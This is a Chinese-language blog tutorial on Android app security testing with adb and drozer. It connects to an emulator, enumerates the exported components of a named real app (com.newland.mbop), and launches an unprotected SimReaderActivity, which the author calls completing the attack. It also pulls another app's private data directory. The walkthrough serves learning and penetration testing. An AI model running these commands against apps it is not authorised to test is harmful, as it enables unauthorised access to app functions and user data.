app测试初窥 - 走看看

zoukankan html css js c++ java

app测试初窥
要用到的两个神器：abd&drozer

adb介绍

adb的全称为Android Debug Bridge，就是起到调试桥的作用，作为一名开发者倒是常用到这个工具.借助adb工具，我们可以管理设备或手机模拟器的状态。还可以进行很多手机操作，如安装软件、卸载软件、系统升级、运行shell命令等等。adb就是连接Android手机与PC端的桥梁，可以让用户在电脑上对手机进行全面的操作。

　　drozer介绍

　　Drozer是MWR Labs开发的一款Android安全测试框架。是目前最好的Android安全测试工具之一。

adb的连接：

C:Usersdef>adb connect 127.0.0.1:62001 #端口一般都是62001或者52001
already connected to 127.0.0.1:62001
C:Usersdef>adb shell
root@android:/ #

drozer的连接:

　　在使用drozer连接之前需要使用adb将pc的tcp31415端口和模拟器进行转发：命令:adb forward tcp:31415 tcp:31415
D:drozer>drozer console connect Selecting 6a3a3c33280b7875 (OPPO R831T 4.4.2) .. ..:. ..o.. .r.. ..a.. . ....... . ..nd ro..idsnemesisand..pr .otectorandroidsneme. .,sisandprotectorandroids+. ..nemesisandprotectorandroidsn:. .emesisandprotectorandroidsnemes.. ..isandp,..,rotectorandro,..,idsnem. .isisandp..rotectorandroid..snemisis. ,andprotectorandroidsnemisisandprotec. .torandroidsnemesisandprotectorandroid. .snemisisandprotectorandroidsnemesisan: .dprotectorandroidsnemesisandprotector. drozer Console (v2.3.4) dz>
复现activity案例：

　　首先你要了解什么是activity：https://baike.baidu.com/item/activity/7304419?fr=aladdin
D:drozer>drozer console connect #连接 Selecting 6a3a3c33280b7875 (OPPO R831T 4.4.2) .. ..:. ..o.. .r.. ..a.. . ....... . ..nd ro..idsnemesisand..pr .otectorandroidsneme. .,sisandprotectorandroids+. ..nemesisandprotectorandroidsn:. .emesisandprotectorandroidsnemes.. ..isandp,..,rotectorandro,..,idsnem. .isisandp..rotectorandroid..snemisis. ,andprotectorandroidsnemisisandprotec. .torandroidsnemesisandprotectorandroid. .snemisisandprotectorandroidsnemesisan: .dprotectorandroidsnemesisandprotector.

dz> run app.package.attacksurface com.newland.mbop #运行攻击面模块要攻击的app

Attack Surface:
8 activities exported #存在八个activity可以调用，activity就是可以越。
2 broadcast receivers exported #存在2个broadcast receivers exported
1 content providers exported #存在1个content providers exported
2 services exported #存在2个services exported

dz> run app.activity.info -a com.newland.mbop
Package: com.newland.mbop
com.newland.mbop.activity.WelcomeActivity #这个是存在漏洞的一个activity，第一个是欢迎界面。
Permission: null
com.newland.mbop.activity.PrintActivity
Permission: null
com.newland.mbop.activity.BankCardReaderActivity
Permission: null
com.newland.mbop.activity.IdentifyCardReaderActivity
Permission: null
com.newland.mbop.activity.SimReaderActivity
Permission: null
com.newland.mbop.activity.ReadIDCardInfoActivity
Permission: null
com.newland.mbop.component.barcode.zxing.CaptureActivity
Permission: null
com.igexin.sdk.GActivity
Permission: null

dz> run app.activity.start --component com.newland.mbop com.newland.mbop.activity.SimReaderActivity #命令执行完即完成攻击

#app.activity.start是其攻击模块。

#--component指定包

#com.newland.mbop.activity.SimReaderActivity服务，使用app.activity.info的时候有显示出来。我选择了倒数第二个。
将缓存文件导入到test目录

adb pull /data/data/com.fjmcc.wangyoubao ./
查看全文

相关阅读:
vs里替换的正则表达式引用
 javascript学习
 filter用法(使静态页面和js通过iis的asp.net过滤器)
表格的交替选择行【jquery中siblings的用法】
表格的cell固定宽度，当内容达到宽度时换行
 collection模块（具名元组、队列、有序字典、默认值字典）、time 模块、随机模块：random、os模块、sys模块、序列化模块
 继承的用法、属性的查找顺序、组合、新式类与经典类、菱形继承等
 多态、以及常用的关于类的方法（isinstance、issubclass、slots等）运算符重载的实现、上下文管理等
 封装、prorerty装饰器、python实现封装的原理等
 面向对象、类和对象、__dict__方法、__init__方法、对象绑定方法、类绑定方法、对象交互

原文地址：https://www.cnblogs.com/xishaonian/p/7414027.html